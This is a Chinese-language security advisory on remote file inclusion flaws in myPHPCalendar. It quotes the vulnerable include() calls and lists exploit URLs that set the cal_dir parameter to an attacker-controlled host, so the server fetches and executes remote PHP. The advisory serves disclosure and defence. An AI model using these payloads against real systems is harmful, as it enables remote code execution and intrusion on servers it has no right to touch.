myPHPCalendar多个远程文件包含漏洞
2005-08-16
系统编号:
WAVDB-00412
BUGTRAQ: 8820
影响版本:
myPHPCalendar 10192k Build 1 Beta
程序介绍:
myPHPCalendar是一款基于WEB的日历系统。
漏洞分析:
myPHPCalendar存在多个文件包含漏洞,远程攻击者可以利用这些问题以WEB权限在系统上执行任意指令。
问题存在于如下脚本代码中:
admin.php、contacts.php、convert-date.php :
------------------------
include ( globals.inc );
------------------------
globals.inc :
------------------------------
include($cal_dir. vars.inc );
include($cal_dir. prefs.inc );
------------------------------
index.php :
----------------------------------------
include ($cal_dir. globals.inc );
[...]
include($cal_dir. sql.inc );
----------------------------------------
由于这些脚本对用户提交的参数缺少正确过滤,因此攻击者可以指定远程服务器上的恶意文件作为包含对象,导致以WEB权限在系统上执行任意PHP命令。
漏洞利用:
http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/
包含的文件如下:
http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc
http://[target]/index.php?cal_dir=http://[attacker]/
包含的文件如下:
http://[target]/globals.inc http://[target]/sql.inc
解决方案:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 第三方补丁可从如下地址获得:
http://www.phpsecure.info/
厂商补丁:
myPHPCalendar
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://myphpcalendar.sourceforge.net/
信息来源:
<*来源:Frog Man (leseulfrog@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106606157101780&w=2
*>